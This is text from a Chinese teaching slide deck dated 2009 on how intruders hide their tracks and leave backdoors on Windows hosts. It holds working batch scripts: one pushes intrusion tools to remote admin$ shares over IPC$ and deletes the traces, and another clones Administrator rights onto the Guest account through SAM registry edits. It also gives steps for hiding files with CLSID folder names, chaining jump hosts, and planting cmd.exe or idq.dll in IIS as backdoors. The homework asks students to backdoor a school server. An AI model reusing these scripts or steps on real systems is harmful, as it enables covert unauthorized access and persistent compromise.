Click to edit Master title style,Click to edit Master text styles,Second level,Third level,Fourth level,Fifth level,11/7/2009,#,项目5攻击的隐藏技术与留后门技术,课题引入,隐藏技术,留后门,课题引入项目背景,获取帐号密码,“基于认证的入侵”即基于“用户名/密码”认证的入,侵。因此，存在获得口令的问题,入侵者一般采取以下手段来获取远程主机的管理员密码：,弱口令扫描：找到存在弱口令的主机,密码监听：通过Sniffer（嗅探器）监听,社交工程学：通过欺诈手段或人际关系获取,暴力破解：获取密码只是时间问题,其它方法：种植木马、安装键盘记录程序,课题引入项目分析,完成本项目需要解决的问题：,为了了保障安全，如何隐藏信息？,如何在计算机上留下后门？,课题引入教学目标,完成本项目需要实现的教学目标：,隐藏计算机信息来保证安全（重点掌握）,在计算机上留下后门，供黑客入侵（掌握）,各种入侵方法的区别及优劣（理解）,课题引入应达到的职业能力,熟练掌握隐藏信息的使用方法,能够通过后门入侵,项目问题1隐藏技术,在前面介绍的入侵技术，入侵者难免与远程主,机/服务器直接接触，这样很容易暴露自己的真实,身份，因此，入侵者需要一些额外的手段来隐藏,自己的行踪。,虽然隐藏技术多种多样，甚至有一些是没有公,开的高级技术，但是对于电子设备构成的网络，,不可能找不到入侵者留下的痕迹。,项目问题1隐藏技术,我们主要了解的隐藏技术：,文件传输隐藏技术,扫描隐藏技术,入侵隐藏技术,文件传输与文件隐藏,入侵文件传输的方法,使用IPC$进行传输，其中有两种方式：copy,命令和xcopy命令（一个重要参数是/E，表示,拷贝前后文件目录结构保持一致）。,映射硬盘方式：映射硬盘方式是图形界面的,操作方式，因此不适合大体积文件的传输，,更不适合入侵者实现“多跳”传输。,FTP传输：不需要IPC$共享，但是必须建立,FTP服务器,文件的压缩,过去使用的文件压缩工具为图形界面方式的，,例如WinRar。如果仅能使用命令行传输文件时，,我们可以使用rarx300进行文件的压缩。,rarx300使用方法：,压缩命令：rar32a,解压缩命令：rar32x,文件压缩实例,第一步：在本地执行rarx300.exe，进行工具解,压，生成rar文件夹，其中rar文件夹中的rar32.exe,才是真正用来压缩的工具,第二步：进入rar文件夹中，通过压缩命令对文,件进行压缩，例如rar32ad:nc.rard:nc.exe对nc,进行压缩,第三步：讲压缩文件和压缩工具rarx300.exe上,传到被入侵的主机,第四步：在被入侵的主机上进行解压操作,Opentelnet简介,Opentelnet是用来解除telnet的NTLM验证的工具。,使用方法：opentelnetip,Opentelnet简介,参数说明:,ip：目标主机ip,：更改telnet的服务端口,：,0：不使用NTLM身份认证,1：先尝试NTLM身份验证，如果失败，再使用,用户名和密码,2：只使用NTLM身份验证,opentelnet实例分析,文件的隐藏,前面我们介绍了通过命令行修改文件属性的方,法，例如我们使用命令“attrib+h+s,c:winnttools”来实现tools文件夹添加隐藏和系,统属性。,在Windows系统中存在一些“系统专用文件,夹”，例如计划任务、控制面板、回收站等等。,实际上，这些文件夹也是可以存放文件的，而,且非常隐藏,使用系统文件夹隐藏文件实例,步骤一：将文件拷贝到计划任务文件夹下,使用系统文件夹隐藏文件实例,步骤二：在dos下查看计划任务文件夹的内容,使用系统文件夹隐藏文件实例,步骤三：在windows图形界面下查看文件夹内容,自己创建系统专用文件夹,首先创建新建一个文件夹，命名为,“fakeTasks.D6277990-4C6A-11CF-8D87-,00AA0060F5BF”,文件夹名字后面的“.”，可以看成是扩展名,当命名成功后，可以发现最终文件夹的名字是,fakeTasks，而且该文件夹与计划任务的文件夹,样子是一样的,自己创建系统专用文件夹,其它常用系统专用文件夹,控制面板：21EC2020-3AEA-1069-A2DD-,08002B30309D,管理工具：D20EA4E1-3957-11d2-A40B-,0C5020524153,打印机配置：2227A280-3AEA-1069-A2DE-,08002B30309D,扫描隐藏技术,我们可以利用“肉鸡”，使用xscan的命令行进,行扫描,利用流光Sensor制作、管理肉鸡,入侵隐藏技术跳板技术,二级跳板结构,二级跳板如何实现入侵,二级跳板制作,步骤一：准备工具，例如Opentelnet.exe、,rar300、Tool.rar(包含nc.exe、漏洞溢出工具、,远程命令执行、远程进程查杀等),二级跳板制作,步骤二：编写BAT文件up.bat,opentelnet.exe%1%2%3122,netuse%1ipc$%3/user:%2,copyrarx300.exe%1admin$rarx300.exe,copyopentelnet.exe%1admin$opentelnet.exe,copytoolscopytoolsrar.rar%1admin$toolstoolsrar.rar,copyup.bat%1admin$up.bat,netuse*/del,delrarx300.exe,delopentelnet.exe,deltools.rar,delup.bat,二级跳板制作,步骤三：把rarx300.exe、opentelnet.exe、,tools.rar和up.bat四个文件拷贝到同一个文件夹下，,然后在dos下进入该文件夹，输入up.bat,1921680106sysback123456192.168.0.106sysback123456来制作第一个跳,板,步骤四：通过telnet192.168.0.10622登录到一,级跳板，然后仿照步骤三制作二级跳板,步骤五：进入二级跳板进行对远程主机的入侵,项目问题2留后门,从入侵者来看，后门分为三种,账号后门,漏洞后门,木马后门,对于一般的账号，我们都可以通过管理工具,用户和组看到，因此需要将后门进行隐藏,项目问题2留后门,创建不容易被发现的后门，最理想的是使用克,隆方法使得“已被禁用的Guest账号”为我所用,克隆的账号是无法通过“管理工具”和“命令”,看出其真实权限和身份的,克隆账号简介,克隆帐号是通过修改注册表的SAM来实现的。SAM,（SecurityAccountManager）是专门用来管理Windows系,统中账号的数据库，里面存放了一个账号所有的属性，包,括账号的配置文件路径、账号权限、账号密码等,要修改SAM，经常需要使用工具PSU.exe，使用方式是：,psu参数选项,p,i默认su到的进程为system,克隆账号实例,步骤一：打开注册表编辑器，可以看到，SAM,一般是无法进行修改的。如果想修改，必须提,升权限,克隆账号实例,步骤二：通过进程管理器查看System进程，并,记录该进程PID，windows2000一般为8,克隆账号实例,步骤三：使用psu.exe提升权限,克隆账号实例,步骤四：查看SAM中的账号信息，其中,UsersNames下有所有账号列表，在User键下，,已十六进制数字为名的键记录着账号的权限、,密码等配置,克隆账号实例,步骤五：克隆账号，就是吧Guest账号的权限克,隆为管理员权限,克隆账号实例,步骤六：禁用Guest账号,克隆账号实例,步骤七：查看Guest账号,克隆账号实例,步骤八：使用Guest账号进行IPC$入侵,命令行方式克隆账号,使用命令行方式克隆账号需要工具：,reg.exe:命令行下的注册表编辑工具,psu.exe:权限提升工具,pslist.exe:查看远程主机进程,命令行方式克隆账号,步骤一：编写BAT文件backdoor.bat,psup“regedit/sdelf.reg”i%1,psup“regcopy,hklmSAMSAMDomainsAccountUsers000001F4f,hklmSAMSAMDomainsAccountUsers000001F5f”,i%1,netuserguest/active:yes,netuserguest123456789,netuserguest/active:no,deldelf.reg,delreg.exe,delpsu.exe,delbackdoor.bat,命令行方式克隆账号,步骤二：使用pslist.exe查看远程主机的System,进程PID，使用命令为“pslistipu用户名p,密码”,步骤三：上传backdoor.bat，执行克隆命令,步骤四：进行验证，退出,漏洞后门,制造Unicode漏洞,步骤一：找出Web根目录,步骤二：拷贝cmd.exe到IIS目录中，一般可,放在IIS的Scripts文件夹中,步骤三：使用文件隐藏方法隐藏文件,步骤四：验证Unicode后门,漏洞后门,制造.idq漏洞,步骤一：把idq.dll传入远程服务器的Scripts目,录中,步骤二：隐藏后门文件,步骤三：利用idq或ida漏洞进行入侵，验证。,总结,完成本项目的学习之后，我们已经掌握了基,于认证入侵的方法。具体内容如下：,掌握了隐藏信息的方法,掌握了在计算机上留后门的方法,作业,对学校网络进行考察，完成以下两个题目：,1.隐藏机房服务器的信息，并通过各种入侵方,式扫描查看,2.在服务器上留下后门,。,